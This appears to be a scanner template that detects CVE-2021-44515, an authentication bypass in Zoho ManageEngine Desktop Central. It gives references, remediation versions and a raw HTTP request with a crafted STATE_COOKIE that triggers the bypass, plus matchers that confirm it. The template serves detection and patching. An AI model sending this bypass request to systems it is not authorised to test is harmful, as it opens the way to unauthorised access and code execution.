45 lines
1.8 KiB
YAML
45 lines
1.8 KiB
YAML
id: CVE-2021-44515
|
|
|
|
info:
|
|
name: Zoho ManageEngine Desktop Central - Remote Code Execution
|
|
author: Adam Crosser
|
|
severity: critical
|
|
description: Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.
|
|
reference:
|
|
- https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog
|
|
- https://srcincite.io/blog/2022/01/20/zohowned-a-critical-authentication-bypass-on-zoho-manageengine-desktop-central.html
|
|
- https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis
|
|
- https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-44515
|
|
remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2021-44515
|
|
cwe-id: CWE-287
|
|
tags: cve,cve2021,cisa,zoho,rce,manageengine
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /STATE_ID/123/agentLogUploader HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Cookie: STATE_COOKIE=&_REQS/_TIME/123
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: dsl
|
|
dsl:
|
|
- "len(body) == 0"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "UEMJSESSIONID="
|
|
|
|
# Enhanced by mp on 2022/05/18
|